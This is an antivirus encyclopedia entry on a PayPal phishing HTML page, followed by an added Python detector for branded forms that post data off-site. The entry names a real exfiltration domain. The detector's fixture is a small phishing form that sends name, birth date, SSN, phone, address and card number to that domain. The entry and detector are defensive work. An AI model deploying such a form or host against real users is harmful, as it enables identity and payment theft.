
PWS:HTML/Payphish.C


First posted on 21 August 2012.
Source: Microsoft

Aliases:

PWS:HTML/Payphish.C is also known as PHISH/PayPal.CT.1 (Avira), Trojan-PWS.HTML.Payphish (Ikarus).

Explanation:



PWS:HTML/Payphish.C is an HTML file that imitates the legitimate PayPal website to steal your information.



Installation

You may receive an HTML email message containing this file, or it may be hosted on a website that you go to.



Payload

Steals user information

PWS:HTML/Payphish.C is an HTML website that may appear similar to the following:



Because the HTML webpage looks similar to the legitimate PayPal site, you may unsuspectingly fill in the page with your account details. If "Save Profile" is clicked, all of the entered information is sent to a remote attacker.

The stolen information may include the following:

  • Your full name
  • Date of birth
  • Social security number if you reside in the US
  • Phone number
  • Current address
  • Credit card information


In the wild, the stolen information has been observed sent to the following website:

psrv1286425620481024cdnbeef.mimesarewelcome.od.ua
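The behaviour described above (a PayPal-branded HTML file whose form submits personal and card data to a non-PayPal host) can be checked statically in a mail or web gateway. The following Python is an added example, not Microsoft's detection logic or code from this entry; the field names, the trusted-domain list, the URL scheme and both sample documents are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

BRAND_DOMAINS = ("paypal.com",)  # assumption: hosts a genuine PayPal form may post to
SENSITIVE = re.compile(r"name|birth|dob|ssn|phone|address|card|cvv", re.I)  # assumed field names

class FormCollector(HTMLParser):
    """Collect each <form> action and the names of the fields inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._cur)
        elif tag in ("input", "select", "textarea") and self._cur is not None and a.get("name"):
            self._cur["fields"].append(a["name"])
    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def is_brand_host(host):
    # Exact or subdomain match only, so "paypal.com.attacker.example" does not pass.
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)

def payphish_like_forms(html):
    """Return (host, sensitive_fields) for PayPal-branded forms that post off-brand."""
    if "paypal" not in html.lower():
        return []
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        host = urlparse(form["action"]).hostname  # None for relative actions
        hits = sorted({n for n in form["fields"] if SENSITIVE.search(n)})
        if host and not is_brand_host(host) and hits:
            findings.append((host, hits))
    return findings

# Constructed samples: the first posts to the host named in this entry, the second to PayPal.
SAMPLE_PHISH = """<html><head><title>PayPal - Update your profile</title></head><body>
<form method="post" action="http://psrv1286425620481024cdnbeef.mimesarewelcome.od.ua/">
<input name="full_name"><input name="dob"><input name="ssn">
<input name="phone"><input name="address"><input name="card_number">
<input type="submit" value="Save Profile"></form></body></html>"""
SAMPLE_LEGIT = """<html><title>PayPal</title><form action="https://www.paypal.com/signin">
<input name="login_email"><input name="login_password"></form></html>"""
```

A match is a triage signal rather than a verdict: forms built or rewritten by script at load time are not visible to a static parse.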



Analysis by Jonathan San Jose

Last update 21 August 2012

 
